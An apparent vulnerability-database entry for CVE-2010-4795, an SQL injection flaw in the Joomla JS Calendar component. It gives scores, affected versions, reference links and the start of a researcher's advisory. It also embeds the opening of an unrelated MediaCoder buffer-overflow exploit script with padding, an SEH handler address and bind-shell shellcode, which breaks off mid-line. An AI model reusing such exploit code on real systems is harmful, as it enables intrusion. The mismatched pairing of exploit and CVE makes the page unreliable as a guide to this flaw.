CVE-2010-4795
published 2011-04-27CVE-2010-4795: SQL injection vulnerability in the JS Calendar (com_jscalendar) component 1.5.1 and 1.5.4 for Joomla! allows remote attackers to execute arbitrary SQL commands…
PriorityP345high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.15%
62.9th percentile
SQL injection vulnerability in the JS Calendar (com_jscalendar) component 1.5.1 and 1.5.4 for Joomla! allows remote attackers to execute arbitrary SQL commands via the ev_id parameter in a details action to index.php. NOTE: some of these details are obtained from third party information.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| joomlaseller | com_jscalendar | — | — |
| joomlaseller | com_jscalendar | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Mediacoder 0.7.5.4797 - '.m3u' Local Buffer Overflow (SEH)
exploitdb·2010-12-02
Mediacoder 0.7.5.4797 - '.m3u' Local Buffer Overflow (SEH)
Mediacoder 0.7.5.4797 - '.m3u' Local Buffer Overflow (SEH)
---
# Exploit Title: MediaCoder-0.7.5.4795.exe 0-days Buffer Overflow (SEH)
# Date: 02 / 12 / 2010
# Author: Oh Yaw Theng
# Software Link: http://www.mediacoderhq.com/mirrors.htm?file=MediaCoder-0.7.5.4795.exe
# Version: v0.7.5.4795 (Latest Version !!)
# Tested on: Microsoft Windows XP SP2
# CVE : N / A
# The vendor is very pitiful . This is the latest version just release in 1 / 12 / 2010
# The software has been exploited at 2 / 12 / 2010
# THis is so sad ! ==
#!/usr/bin/python
filename = "crash.m3u"
junk = "\x41" * 764
pointer = "\xEB\x08\x90\x90"
handler = "\x54\x41\x62\x01" # 01624154
nops = "\x90" * 20
# Bind a shell at Port 5555 (Telnet in and Boom !! DEADBEEF !)
shellcode =(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x
Exploit-DB
Joomla! Component JS Calendar 1.5.1 - Multiple Vulnerabilities
exploitdb·2010-10-09
CVE-2010-4795 Joomla! Component JS Calendar 1.5.1 - Multiple Vulnerabilities
Joomla! Component JS Calendar 1.5.1 - Multiple Vulnerabilities
---
JS Calendar 1.5.1 Joomla Component Multiple Remote Vulnerabilities
Name JS Calendar
Vendor http://www.joomlaseller.com
Versions Affected 1.5.1
Author Salvatore Fresta aka Drosophila
Website http://www.salvatorefresta.net
Contact salvatorefresta [at] gmail [dot] com
Date 2010-10-09
X. INDEX
I. ABOUT THE APPLICATION
II. DESCRIPTION
III. ANALYSIS
IV. SAMPLE CODE
V. FIX
I. ABOUT THE APPLICATION
JoomlaSeller - Calendar Event is a powerful Joomla!
component which allows you to easily create events and
publish them on a desired date. It is a native build
component for Joomla! 1.5 version and can easily be
installed using the Joomla! back-end Install
functionality.
II. DESCRIPTION
Some parameters are not properly saniti
No writeups or analysis indexed.
http://adv.salvatorefresta.net/JS_Calendar_1.5.1_Joomla_Component_Multiple_Remote_Vulnerabilities-09102010.txthttp://secunia.com/advisories/41766http://securityreason.com/securityalert/8223http://www.exploit-db.com/exploits/15224http://www.securityfocus.com/bid/43902https://exchange.xforce.ibmcloud.com/vulnerabilities/62379http://adv.salvatorefresta.net/JS_Calendar_1.5.1_Joomla_Component_Multiple_Remote_Vulnerabilities-09102010.txthttp://secunia.com/advisories/41766http://securityreason.com/securityalert/8223http://www.exploit-db.com/exploits/15224http://www.securityfocus.com/bid/43902https://exchange.xforce.ibmcloud.com/vulnerabilities/62379
2011-04-27
Published